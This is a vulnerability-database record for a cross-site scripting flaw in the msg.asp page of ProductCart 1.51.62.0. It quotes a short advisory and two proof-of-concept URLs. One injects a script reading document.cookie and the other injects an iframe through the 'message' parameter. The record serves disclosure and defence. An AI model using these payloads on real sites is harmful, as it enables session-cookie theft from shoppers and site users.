Description
ProductCart 1.51.62.0 - MSG.asp Cross-Site Scripting
{"lastseen": "2020-04-01T19:04:44", "references": [], "description": "\nProductCart 1.51.62.0 - MSG.asp Cross-Site Scripting", "edition": 1, "reporter": "atomix", "exploitpack": {"type": "webapps", "platform": "asp"}, "published": "2003-07-05T00:00:00", "title": "ProductCart 1.51.62.0 - MSG.asp Cross-Site Scripting", "type": "exploitpack", "enchantments": {"dependencies": {}, "score": {"value": -0.0, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.0}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2003-07-05T00:00:00", "id": "EXPLOITPACK:3AF36DDBA7EE385FA88B029C65CE2CB9", "href": "", "viewCount": 4, "sourceData": "source: https://www.securityfocus.com/bid/8108/info\n\nA cross-site scripting vulnerability has been reported for ProductCart. The vulnerability exists due to insufficient sanitization of some user-supplied values.\n\nExploitation could permit an attacker to steal cookie-based authentication credentials or launch other attacks.\n\nhttp://www.website.com/ProductCart/pc/msg.asp?message=><script>alert\n(document.cookie);</script>\n\nhttp://www.website.com/ProductCart/pc/msg.asp?message=<iframe%20src=\"C:\\\"%\n20width=400%20height=400></iframe>", "cvss": {"score": 0.0, "vector": "NONE"}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645695038, "score": 1659814272}, "_internal": {"score_hash": "7a4ede69e20d986bbaaafb0cd1dad406"}}
{}
ProductCart 1.51.62.0 - MSG.asp Cross-Site Scripting